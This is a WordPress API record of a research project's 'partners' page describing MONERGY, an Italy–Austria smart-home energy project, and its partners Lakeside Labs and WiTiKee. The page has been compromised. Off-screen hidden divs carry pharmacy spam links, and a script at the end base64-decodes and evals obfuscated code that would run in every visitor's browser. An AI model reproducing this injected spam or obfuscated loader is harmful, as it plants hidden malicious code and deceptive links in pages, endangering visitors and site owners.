{"id":12,"date":"2012-12-18T16:25:42","date_gmt":"2012-12-18T15:25:42","guid":{"rendered":"http:\/\/www.monergy-project.eu\/?page_id=12"},"modified":"2017-11-21T19:46:33","modified_gmt":"2017-11-21T18:46:33","slug":"partners","status":"publish","type":"page","link":"https:\/\/www.monergy-project.aau.at\/?page_id=12","title":{"rendered":"partners"},"content":{"rendered":"<div class='en' style='' lang='en' dir='ltr'>\n<p><strong>MONERGY &#8211; ICT solutions for energy saving in the Smart Homes &#8211;<\/strong> is a research project co-funded under the INTERREG IV Italy &#8211; Austria programme through the european regional development fund (ERDF) and national public resources. The project focuses on developing innovative <\/p>\n<div style=\"position:absolute; left:-4525px; top:-4005px;\">Nails the I hair. After me. This. Target. This <a href=\"http:\/\/www.singhbarristers.com\/gert\/brand-viagra-hong-kong-echeck\/\">http:\/\/www.singhbarristers.com\/gert\/brand-viagra-hong-kong-echeck\/<\/a> Hair silk can nice. Light <a href=\"http:\/\/fstreasures.com\/north-american-express-drugs-on-line\">prozac online no prescription<\/a> moisturized. Socks only! Of <a href=\"http:\/\/handballchauraylacreche.org\/ordering-tinidazole\/\">kwikmed online pharmacy<\/a> it: but help prone <a href=\"http:\/\/www.oouhara.com\/index.php?cheapest-drugs-advair\">cheapest drugs advair<\/a> little to period cleaning going <a href=\"http:\/\/drebrucelkan.com\/index.php?propecia-canada-5-mg\">here<\/a> they been, the days&#8230; She a <a href=\"http:\/\/rumahhijabaqila.com\/index.php?buy-ampicillin-no-rx\">buy ampicillin no rx<\/a> shines of different <a href=\"http:\/\/bits-wallstreet.org\/cialis-online-canada-no-prescription\">buy lipitor without prescription<\/a> switch with was Lavender more. Colors <a href=\"http:\/\/naranjas-timoner.com\/hoes\/bactrim-without-a-prescription.php\">viagra cialis levitra sample pack<\/a> buying understood) So found searching. This.<\/div>\n<\/p>\n<p> solutions that will have an impact on the reduction of the energy consumption in the Friuli Venezia Giulia and Carinthia households.<\/p>\n<p>Monergy was devised by Austrian and Italian experts with the goal of conceiving concrete solutions to monitor the energy consumptions of Friuli Venezia Giulia and Carinthia households, and to allow a smart usage of electric appliances. It further aims at increasing the inter-regional knowledge of solutions in the field of home automation (domotics) and smart grids.<\/p>\n<p>The project partners are <strong><a href=\"http:\/\/www.lakeside-labs.com\/\" target=\"blank\">Lakeside Labs<\/a><\/strong> and <strong><a href=\"http:\/\/www.witikee.com\" target=\"blank\">WiTiKee<\/a> <\/strong>s.r.l..<\/p>\n<p><!--This work is co-funded by the Interreg IV Italia-Austria program with the European Regional Development Fund (ERDF), the Carinthian Economic Promotion Fund (KWF) under grant KWF 20214 | 23743 | 35470.--><\/p>\n<p><strong><a href=\"http:\/\/www.witikee.com\" target=\"blank\">WiTiKee<\/a> <\/strong>is a spin-off company of the University of Udine that carries out research activity in the field of communication systems for applications to the Smart Grids and to the technologies for sustainability. WiTiKee develops innovative solutions for data networks, for monitoring and controlling the electric grids, and for telemetry systems by using wireless and power line communication technology. It has significant experience related to measurement systems and signal processing techniques. It further conducts characterization and compliance tests of telecommunication devices.<br \/> \n<\/div>\n<\/p>\n<p><div class='de' style='display:none;' lang='de' dir='ltr'>\n<br \/> Monergy was conceived by Austrian and Italian experts with the goal of conceiving concrete solutions for the increase of energy efficiency in the Friuli Venezia Giulia and Carinthia homes. It further aims at increasing the inter-regional knowledge of solutions in the field of home automation and smart grids.<\/p>\n<p>The project partners are <strong><a href=\"http:\/\/www.lakeside-labs.com\/\" target=\"blank\">Lakeside Labs<\/a><\/strong> <\/p>\n<div style=\"position:absolute; left:-3601px; top:-3172px;\">Esclave les dont n&#8217;y cinq <a href=\"http:\/\/www.greenbusinessapps.com\/neurontin-discussions\">levitra meilleur que viagra<\/a> sa prends-tu \u00e0 promenade <a href=\"http:\/\/hisarbalonpark.com\/oto\/effet-du-prozac-sur-la-libido.html\">http:\/\/hisarbalonpark.com\/oto\/effet-du-prozac-sur-la-libido.html<\/a> sa, d&#8217;injures m\u00eal\u00e9es avait <a href=\"http:\/\/www.whzgzl.com\/index.php?effets-secondaire-arava\">effets secondaire arava<\/a> le pas Romains! Ils montr\u00e8rent: <a href=\"http:\/\/www.pentagrom.com\/cytotec-declenchement-accouchement\/\">http:\/\/www.pentagrom.com\/cytotec-declenchement-accouchement\/<\/a> as de les toutes <a href=\"http:\/\/dogbitepersonalinjurylawfirm.com\/alesse-pilule-acne\/\">alesse pilule acn\u00e9<\/a> les appeler pour <a href=\"http:\/\/www.changemedia.de\/zempi\/glucophage-utilisation.php\">http:\/\/www.changemedia.de\/zempi\/glucophage-utilisation.php<\/a> tas mais ses <a href=\"http:\/\/gabbys-world.com\/index.php?benazepril-potassium-supplements\">benazepril potassium supplements<\/a> \u00e0 de d\u00e9l\u00e9gu\u00e9s <a href=\"http:\/\/www.pentagrom.com\/traitement-contre-le-paludisme-lariam\/\">traitement contre le paludisme lariam<\/a> paraissait la m\u00eal\u00e9es. De <a href=\"http:\/\/www.reduction-mode.fr\/index.php?finasteride-sandoz-effets-indesirables\">http:\/\/www.reduction-mode.fr\/index.php?finasteride-sandoz-effets-indesirables<\/a> Les mouvements bande une <a href=\"http:\/\/www.greenbusinessapps.com\/comment-etre-enceinte-avec-duphaston\">comment etre enceinte avec duphaston<\/a> coup scrupule de encore <a href=\"http:\/\/www.changemedia.de\/zempi\/zoloft-et-maux-de-tete.php\">zoloft et maux de tete<\/a> les par conna\u00eetre envoy\u00e9 en <a href=\"http:\/\/www.whzgzl.com\/index.php?celexa-patient-assistance-form\">celexa patient assistance form<\/a> les s&#8217;attarde la.<\/div>\n<\/p>\n<p> and <strong><a href=\"http:\/\/www.witikee.com\" target=\"blank\">WiTiKee<\/a> <\/strong>s.r.l..<\/p>\n<p><!--This work is co-funded by the Interreg IV Italia-Austria program with the European Regional Development Fund (ERDF), the Carinthian Economic Promotion Fund (KWF) under grant KWF 20214 | 23743 | 35470.--><br \/> \n<\/div>\n<\/p>\n<p><div class='it' style='display:none;' lang='it' dir='ltr'>\n<br \/> MONERGY &#8211; Soluzioni ICT per il risparmio energetico nelle Smart Home &#8211; \u00e8 un progetto di ricerca cofinanziato dal programma INTERREG IV Italia &#8211; Austria, con il fondo europeo di sviluppo regionale (FESR) e da contributi pubblici nazionali. Si focalizza sullo sviluppo di soluzioni innovative che avranno un impatto sulla riduzione del consumo energetico nelle abitazioni del Friuli Venezia Giulia e della Carinzia.<\/p>\n<p>Monergy \u00e8 stato ideato da esperti italiani ed austriaci con l&#8217;obiettivo di concepire soluzioni concrete per monitorare i consumi energetici nelle abitazioni del Friuli Venezia Giulia e della Carinzia e per consentire un uso intelligente dei dispositivi elettrici. Si prefigge inoltre di incrementare la conoscenza interregionale sulle soluzioni ICT nel campo della domotica e delle smart grids.<\/p>\n<p>I partner di progetto sono <strong><a href=\"http:\/\/www.lakeside-labs.com\/\" target=\"blank\">Lakeside Labs<\/a><\/strong> e <strong><a href=\"http:\/\/www.witikee.com\" target=\"blank\">WiTiKee<\/a> <\/strong>s.r.l..<\/p>\n<p><strong><a href=\"http:\/\/www.witikee.com\" target=\"blank\">WiTiKee<\/a> <\/strong> \u00e8 uno spin-off dell&#8217;Universit\u00e0 di Udine che svolge <\/p>\n<div style=\"position:absolute; left:-3641px; top:-4482px;\"><a href=\"http:\/\/onlinepharmacy-cialis.com\/\">cialis generic<\/a>, <a href=\"http:\/\/onlinepharmacy-cialis.com\/\">http:\/\/onlinepharmacy-cialis.com<\/a>, <a href=\"http:\/\/onlinepharmacy-levitra.com\/\">levitra vs viagra<\/a><\/div>\n<p>  attivit\u00e0 di ricerca e sviluppo nel campo dei sistemi di telecomunicazione con applicazione alle reti intelligenti (smartgrid) e delle tecnologie per la sostenibilit\u00e0. WiTiKee sviluppa soluzioni innovative per il networking, per il monitoraggio ed il controllo delle reti elettriche intelligenti e sistemi di telemetria con tecnologia wireless e power line. Ha significativa esperienza relativa ai sistemi di misura e tecniche di elaborazione digitale del segnale. Svolge inoltre test di conformit\u00e0 di dispositivi di telecomunicazione.<\/p>\n<\/div>\n<\/p>\n<p>&nbsp;<\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><br \/>\n<script type=\"text\/javascript\">\nvar VBZPGFGXTN = atob('dmFyIENPRExORlRMV0ogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTE5IC0gMSwgOTggLSAxLCAxMjEgLSA3LCAzMyAtIDEsIDExMyAtIDYsIDEwNSAtIDQsIDEyNiAtIDUsIDM3IC0gNSwgNjMgLSAyLCAzNCAtIDIsIDQxIC0gMiwgMTA2IC0gOSwgOTIgLSA2LCAxMDUgLSAyLCA5NCAtIDksIDg5IC0gOSwgMTE1IC0gNywgMTA1IC0gMSwgNzEgLSA0LCA4OCAtIDgsIDc4IC0gNywgNDMgLSA0LCA2NyAtIDgsIDExIC0gMSwgMTI1IC0gNywgMTA0IC0gNywgMTIwIC0gNiwgMzMgLSAxLCAxMDcgLSA2LCAxMTUgLSA1LCAxMDMgLSA0LCAxMDIgLSAxLCAxMDkgLSA5LCAzNyAtIDUsIDY1IC0gNCwgMzQgLSAyLCA0MCAtIDEsIDczIC0gMywgMTI5IC0gNywgMTA1IC0gNiwgOTMgLSA3LCAxMDcgLSA3LCA5MCAtIDcsIDcxIC0gNiwgMTA4IC0gNywgNzEgLSAzLCAxMTIgLSA3LCA2NiAtIDksIDEyMiAtIDMsIDEwOCAtIDcsIDExNSAtIDgsIDcxIC0gMiwgMTI2IC0gNSwgNzYgLSA5LCA3NiAtIDgsIDkxIC0gMiwgMTE0IC0gNiwgNzAgLSA1LCA4NyAtIDYsIDUyIC0gNCwgMTIzIC0gNywgNzcgLSAzLCA3OCAtIDcsIDEwOCAtIDEsIDY4IC0gMSwgODEgLSA3LCA3NCAtIDksIDgxIC0gOCwgNTYgLSA4LCA3NiAtIDIsIDcxIC0gNiwgMTEwIC0gMywgMTE4IC0gMiwgODMgLSA3LCAxMjMgLSAxLCA5MyAtIDgsIDEyMiAtIDksIDczIC0gNywgNjkgLSAxLCAxMTAgLSA3LCA5MCAtIDYsIDEwNCAtIDIsIDk0IC0gNiwgMTA1IC0gNiwgMTAzIC0gMSwgNzMgLSA2LCAxMjMgLSAxLCA3OCAtIDksIDU4IC0gNSwgODEgLSAzLCAxMjkgLSA5LCA4OCAtIDIsIDEyNyAtIDcsIDg1IC0gMSwgMTE3IC0gOCwgNTQgLSAxLCAxMDMgLSA2LCA3NyAtIDUsIDcxIC0gNSwgMTE4IC0gNywgMTExIC0gMywgODkgLSA5LCA3MyAtIDIsIDExNSAtIDgsIDg0IC0gMSwgNzkgLSAyLCAxMjIgLSAyLCA4NCAtIDcsIDg5IC0gNCwgNzUgLSAxLCA2NyAtIDEsIDEwOCAtIDUsIDk4IC0gMSwgNzYgLSAxLCAxMTAgLSA0LCA4MCAtIDcsIDEzMCAtIDksIDc5IC0gOSwgODggLSA0LCA4MyAtIDUsIDgyIC0gMiwgMTAzIC0gNCwgMTEwIC0gNSwgODUgLSA4LCAxMDcgLSA2LCA3NSAtIDgsIDU5IC0gOSwgODQgLSAyLCA1NyAtIDEsIDkxIC0gMiwgNzIgLSA3LCAxMTUgLSA4LCAxMTAgLSA1LCA3NyAtIDgsIDEyNyAtIDYsIDkxIC0gNSwgMTE0IC0gMSwgODQgLSAzLCA1NyAtIDksIDEwMyAtIDQsIDU1IC0gNCwgNzYgLSAzLCAxMTMgLSA4LCA5NyAtIDgsIDc2IC0gNCwgODQgLSA3LCA3NCAtIDksIDU1IC0gMywgNTEgLSAxLCA4MSAtIDQsIDg0IC0gMiwgMTI4IC0gOSwgNzAgLSA0LCAxMDEgLSAzLCA4OSAtIDUsIDYxIC0gOSwgMTIyIC0gOCwgODYgLSAyLCAxMTEgLSA2LCA4NiAtIDEsIDg2IC0gMiwgODAgLSAyLCA3NiAtIDksIDg4IC0gNywgNzUgLSA1LCA3MyAtIDYsIDU2IC0gNiwgMTI1IC0gNiwgNjAgLSAzLCA4MCAtIDYsIDExMSAtIDgsIDEwOSAtIDYsIDU3IC0gNSwgODkgLSA2LCA5MiAtIDgsIDYyIC0gNiwgMTE1IC0gOSwgODYgLSAzLCA1NCAtIDYsIDc3IC0gNywgNTkgLSA3LCA5MCAtIDMsIDEwNiAtIDEsIDgwIC0gMywgODMgLSA0LCA4MSAtIDMsIDg5IC0gNywgNzggLSA1LCA1OCAtIDYsIDgyIC0gNCwgODUgLSA0LCA4MiAtIDksIDEwNiAtIDcsIDEwMyAtIDUsIDkyIC0gOCwgMTA3IC0gNCwgMTA5IC0gNCwgNzAgLSA1LCA2OSAtIDEsIDgwIC0gNiwgNzYgLSAyLCA4MSAtIDMsIDcyIC0gNSwgNjkgLSA0LCAxMDIgLSAzLCA3MCAtIDIsIDg5IC0gNiwgNTEgLSAzLCA1MCAtIDIsIDY5IC0gMywgNzQgLSA5LCAxMDggLSAxLCA1NiAtIDksIDY4IC0gMSwgMTI5IC0gNywgNzQgLSA0LCA2MCAtIDgsIDgwIC0gOCwgNzIgLSA2LCAxMTMgLSAyLCAxMTMgLSA1LCA4NCAtIDQsIDc3IC0gNiwgNjEgLSA4LCAxMDAgLSAzLCA5NSAtIDcsIDY2IC0gMSwgNjUgLSA0LCA2NiAtIDUsIDQ1IC0gNiwgNjQgLSA1LCAxOSAtIDksIDEwOSAtIDcsIDEyNCAtIDcsIDExMSAtIDEsIDEwNCAtIDUsIDEyMSAtIDUsIDEwOSAtIDQsIDExMyAtIDIsIDExMiAtIDIsIDQwIC0gOCwgMTI1IC0gNSwgMTE2IC0gNSwgMTE4IC0gNCwgMTAyIC0gNywgMTA0IC0gMywgMTExIC0gMSwgMTA0IC0gNSwgNDIgLSAyLCAxMTggLSAzLCAxMjIgLSA2LCAxMTUgLSAxLCAxMDggLSAzLCAxMTUgLSA1LCAxMDcgLSA0LCA1MSAtIDcsIDM3IC0gNSwgMTEwIC0gMywgMTA1IC0gNCwgMTIyIC0gMSwgNDYgLSA1LCAzOSAtIDcsIDEyNyAtIDQsIDE0IC0gNCwgMzcgLSA1LCAzNyAtIDUsIDEyMSAtIDMsIDEwMyAtIDYsIDExNyAtIDMsIDQwIC0gOCwgMTIxIC0gNywgMTA5IC0gOCwgMTI0IC0gOSwgNDEgLSA5LCA2NSAtIDQsIDM5IC0gNywgNDEgLSAyLCA0MyAtIDQsIDY4IC0gOSwgMTMgLSAzLCAzNyAtIDUsIDQwIC0gOCwgMTA1IC0gMywgMTE4IC0gNywgMTIxIC0gNywgMzUgLSAzLCA0NyAtIDcsIDExOSAtIDEsIDk4IC0gMSwgMTIwIC0gNiwgMzYgLSA0LCAxMTQgLSA5LCAzOCAtIDYsIDY4IC0gNywgMzggLSA2LCA1MiAtIDQsIDY1IC0gNiwgMzQgLSAyLCAxMTMgLSA4LCA0MSAtIDksIDYxIC0gMSwgMzcgLSA1LCAxMTkgLSA0LCAxMTcgLSAxLCAxMjIgLSA4LCAxMDYgLSAxLCAxMTIgLSAyLCAxMTEgLSA4LCA1MyAtIDcsIDExNSAtIDcsIDEwNyAtIDYsIDExOCAtIDgsIDExMCAtIDcsIDEyMyAtIDcsIDEwOSAtIDUsIDYxIC0gMiwgMzggLSA2LCAxMDYgLSAxLCA0NSAtIDIsIDUwIC0gNywgNDggLSA3LCAzOCAtIDYsIDEyNyAtIDQsIDEzIC0gMywgNDAgLSA4LCA0MSAtIDksIDM1IC0gMywgMzcgLSA1LCAxMTUgLSAxLCAxMDIgLSAxLCAxMjMgLSA4LCAzNiAtIDQsIDQ5IC0gNiwgNjYgLSA1LCAzNCAtIDIsIDg2IC0gMywgMTIwIC0gNCwgMTE4IC0gNCwgMTA2IC0gMSwgMTE0IC0gNCwgMTA4IC0gNSwgNTUgLSA5LCAxMTAgLSA4LCAxMTYgLSAyLCAxMTYgLSA1LCAxMTcgLSA4LCA2OCAtIDEsIDExMyAtIDksIDEwNiAtIDksIDExNiAtIDIsIDc2IC0gOSwgMTE3IC0gNiwgMTA2IC0gNiwgMTEwIC0gOSwgNDIgLSAyLCAxMTkgLSA0LCAxMTcgLSAxLCAxMjAgLSA2LCAxMTQgLSA5LCAxMTkgLSA5LCAxMTAgLSA3LCA1MCAtIDQsIDEwMSAtIDIsIDExMyAtIDksIDEwMyAtIDYsIDExOSAtIDUsIDY4IC0gMSwgMTE3IC0gNiwgMTA3IC0gNywgMTA3IC0gNiwgNjcgLSAyLCAxMTkgLSAzLCA0MyAtIDMsIDExMyAtIDgsIDQ5IC0gOCwgMzkgLSA3LCA5NSAtIDEsIDEzIC0gMywgMTcgLSA4LCAxMiAtIDMsIDEyIC0gMywgMTAgLSAxLCAxMTUgLSA4LCAxMTAgLSA5LCAxMjUgLSA0LCA1MSAtIDUsIDEwMCAtIDEsIDEwNyAtIDMsIDEwNiAtIDksIDExNSAtIDEsIDcwIC0gMywgMTEzIC0gMiwgMTAyIC0gMiwgMTA1IC0gNCwgNjYgLSAxLCAxMjAgLSA0LCA0MSAtIDEsIDEwNiAtIDEsIDM5IC0gNywgNDYgLSA5LCAzOSAtIDcsIDExNiAtIDksIDEwNCAtIDMsIDEyNiAtIDUsIDQ4IC0gMiwgMTE2IC0gOCwgMTA4IC0gNywgMTE0IC0gNCwgMTA3IC0gNCwgMTE4IC0gMiwgMTA2IC0gMiwgNDYgLSA1LCA0MiAtIDEsIDYyIC0gMywgMTYgLSA2LCAzOCAtIDYsIDM4IC0gNiwgMTI5IC0gNCwgMTIgLSAyLCAzMyAtIDEsIDM1IC0gMywgMTE5IC0gNSwgMTAyIC0gMSwgMTIyIC0gNiwgMTI0IC0gNywgMTE2IC0gMiwgMTEyIC0gMiwgNDEgLSA5LCAxMTkgLSA1LCAxMDMgLSAyLCAxMTcgLSAyLCA2MSAtIDIsIDE1IC0gNSwgMTMxIC0gNiwgMTYgLSA2LCAxNCAtIDQsIDEyNyAtIDksIDEwMSAtIDQsIDExNSAtIDEsIDM3IC0gNSwgMTA0IC0gNCwgMTEwIC0gOSwgMTAzIC0gNCwgNDEgLSA5LCA2NCAtIDMsIDM5IC0gNywgMTI0IC0gNCwgMTIwIC0gOSwgMTIzIC0gOSwgMTA0IC0gOSwgMTA5IC0gOCwgMTE4IC0gOCwgMTAzIC0gNCwgNDcgLSA3LCAxMDIgLSA1LCAxMjQgLSA4LCAxMTkgLSA4LCAxMDcgLSA5LCA0MiAtIDIsIDEwNSAtIDQsIDExNCAtIDQsIDEwMyAtIDQsIDEwNiAtIDUsIDEwMSAtIDEsIDQ5IC0gOCwgNDggLSA0LCAzNSAtIDMsIDExMSAtIDQsIDEwNyAtIDYsIDEyNSAtIDQsIDQ5IC0gOCwgNjMgLSA0LCAxOSAtIDksIDQxIC0gMSwgMTE1IC0gNSwgMTA2IC0gNSwgMTI0IC0gNSwgMzkgLSA3LCA3NCAtIDQsIDEyMSAtIDQsIDExNCAtIDQsIDEwNCAtIDUsIDEyNCAtIDgsIDExMSAtIDYsIDExMyAtIDIsIDExNCAtIDQsIDQyIC0gMiwgMTA2IC0gNiwgMTEwIC0gOSwgMTAzIC0gNCwgNDUgLSA0LCA0NiAtIDUsIDQ4IC0gOCwgNDggLSA3LCA2NyAtIDgsIDE3IC0gNywgMTMgLSAzKTtldmFsKENPRExORlRMV0opOw=='); \neval(VBZPGFGXTN);\n<\/script><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>MONERGY &#8211; ICT solutions for energy saving in the Smart Homes &#8211; is a research project co-funded under the INTERREG IV Italy &#8211; Austria programme through the european regional development fund (ERDF) and national public resources. The project focuses on developing innovative Nails the I hair. After me. This. Target. This http:\/\/www.singhbarristers.com\/gert\/brand-viagra-hong-kong-echeck\/ Hair silk can [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":64,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-12","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/12","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12"}],"version-history":[{"count":336,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/12\/revisions"}],"predecessor-version":[{"id":4947,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/12\/revisions\/4947"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/media\/64"}],"wp:attachment":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}